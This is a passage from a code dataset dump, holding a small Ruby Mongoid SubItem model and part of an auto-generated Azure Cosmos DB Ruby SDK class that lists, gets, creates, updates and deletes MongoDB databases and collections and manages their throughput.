hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
4a20b017e64545ae18b6ca68eadd0421b81398d3 | 78 | # frozen_string_literal: true
# A document embedded within a parent document (Mongoid `embedded_in :parent`),
# inheriting fields and persistence behavior from Item.
class SubItem < Item
embedded_in :parent
end
| 13 | 29 | 0.782051 |
9139f2d6500c06312d631bffa2fcf53203d456cb | 98,226 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Cosmosdb::Mgmt::V2020_06_01_preview
#
# MongoDBResources
#
class MongoDBResources
include MsRestAzure
#
# Creates and initializes a new instance of the MongoDBResources class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
# Store the service client; every operation in this class issues its
# HTTP requests through it.
@client = client
end
# @return [CosmosDBManagementClient] reference to the CosmosDBManagementClient
attr_reader :client
#
# Lists the MongoDB databases under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBDatabaseListResult] operation results, or nil when the
# underlying response is nil.
#
def list_mongo_dbdatabases(resource_group_name, account_name, custom_headers:nil)
  # Block on the async variant and unwrap just the deserialized body.
  result = list_mongo_dbdatabases_async(resource_group_name, account_name, custom_headers:custom_headers).value!
  result&.body
end
#
# Lists the MongoDB databases under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_mongo_dbdatabases_with_http_info(resource_group_name, account_name, custom_headers:nil)
  # Delegate to the async variant and block for the full operation response.
  promise = list_mongo_dbdatabases_async(resource_group_name, account_name, custom_headers:custom_headers)
  promise.value!
end
#
# Lists the MongoDB databases under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_mongo_dbdatabases_async(resource_group_name, account_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBDatabaseListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the MongoDB databases under an existing Azure Cosmos DB database account
# with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBDatabaseGetResults] operation results, or nil when the
# underlying response is nil.
#
def get_mongo_dbdatabase(resource_group_name, account_name, database_name, custom_headers:nil)
  # Block on the async variant and unwrap just the deserialized body.
  result = get_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
  result&.body
end
#
# Gets the MongoDB databases under an existing Azure Cosmos DB database account
# with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_mongo_dbdatabase_with_http_info(resource_group_name, account_name, database_name, custom_headers:nil)
  # Delegate to the async variant and block for the full operation response.
  promise = get_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers)
  promise.value!
end
#
# Gets the MongoDB databases under an existing Azure Cosmos DB database account
# with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBDatabaseGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Create or updates Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param create_update_mongo_dbdatabase_parameters
# [MongoDBDatabaseCreateUpdateParameters] The parameters to provide for the
# current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBDatabaseGetResults] operation results, or nil when the
# underlying response is nil.
#
def create_update_mongo_dbdatabase(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:nil)
  # Block on the long-running async variant and unwrap the result body.
  result = create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:custom_headers).value!
  result&.body
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param create_update_mongo_dbdatabase_parameters
# [MongoDBDatabaseCreateUpdateParameters] The parameters to provide for the
# current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:nil)
  # Issue the initial request that starts the long-running operation.
  initial_promise = begin_create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:custom_headers)
  # Maps the final polled payload onto the result model.
  deserializer = lambda do |parsed_response|
    mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBDatabaseGetResults.mapper()
    @client.deserialize(mapper, parsed_response)
  end
  # Poll until the operation reaches a terminal state.
  initial_promise.then do |response|
    @client.get_long_running_operation_result(response, deserializer)
  end
end
#
# Deletes an existing Azure Cosmos DB MongoDB database.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [nil] the delete operation returns no body.
#
def delete_mongo_dbdatabase(resource_group_name, account_name, database_name, custom_headers:nil)
  # Block until the long-running delete completes (value! re-raises any
  # failure); the unused `response` local from the generated code is dropped.
  delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
  nil
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:nil)
  # Issue the initial request that starts the long-running delete.
  initial_promise = begin_delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers)
  # Delete returns no payload, so the deserializer is a no-op.
  noop_deserializer = lambda { |_parsed_response| }
  # Poll until the operation reaches a terminal state.
  initial_promise.then do |response|
    @client.get_long_running_operation_result(response, noop_deserializer)
  end
end
#
# Gets the RUs per second of the MongoDB database under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results, or nil when the
# underlying response is nil.
#
def get_mongo_dbdatabase_throughput(resource_group_name, account_name, database_name, custom_headers:nil)
  # Block on the async variant and unwrap just the deserialized body.
  result = get_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
  result&.body
end
#
# Gets the RUs per second of the MongoDB database under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_mongo_dbdatabase_throughput_with_http_info(resource_group_name, account_name, database_name, custom_headers:nil)
  # Delegate to the async variant and block for the full operation response.
  promise = get_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, custom_headers:custom_headers)
  promise.value!
end
#
# Gets the RUs per second of the MongoDB database under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/throughputSettings/default'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Update RUs per second of the an Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results, or nil when the
# underlying response is nil.
#
def update_mongo_dbdatabase_throughput(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:nil)
  # Block on the long-running async variant and unwrap the result body.
  result = update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:custom_headers).value!
  result&.body
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:nil)
  # Issue the initial request that starts the long-running operation.
  initial_promise = begin_update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:custom_headers)
  # Maps the final polled payload onto the result model.
  deserializer = lambda do |parsed_response|
    mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
    @client.deserialize(mapper, parsed_response)
  end
  # Poll until the operation reaches a terminal state.
  initial_promise.then do |response|
    @client.get_long_running_operation_result(response, deserializer)
  end
end
#
# Lists the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBCollectionListResult] operation results, or nil when the
# underlying response is nil.
#
def list_mongo_dbcollections(resource_group_name, account_name, database_name, custom_headers:nil)
  # Block on the async variant and unwrap just the deserialized body.
  result = list_mongo_dbcollections_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
  result&.body
end
#
# Lists the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_mongo_dbcollections_with_http_info(resource_group_name, account_name, database_name, custom_headers:nil)
  # Delegate to the async variant and block for the full operation response.
  promise = list_mongo_dbcollections_async(resource_group_name, account_name, database_name, custom_headers:custom_headers)
  promise.value!
end
#
# Lists the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_mongo_dbcollections_async(resource_group_name, account_name, database_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBCollectionListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBCollectionGetResults] operation results, or nil when the
# underlying response is nil.
#
def get_mongo_dbcollection(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
  # Block on the async variant and unwrap just the deserialized body.
  result = get_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
  result&.body
end
#
# Gets the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_mongo_dbcollection_with_http_info(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
  # Resolve the async call but keep the full operation-response wrapper.
  promise = get_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers)
  promise.value!
end
#
# Gets the MongoDB collection under an existing Azure Cosmos DB database
# account.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers
# that will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, 'collection_name is nil' if collection_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name,'collectionName' => collection_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
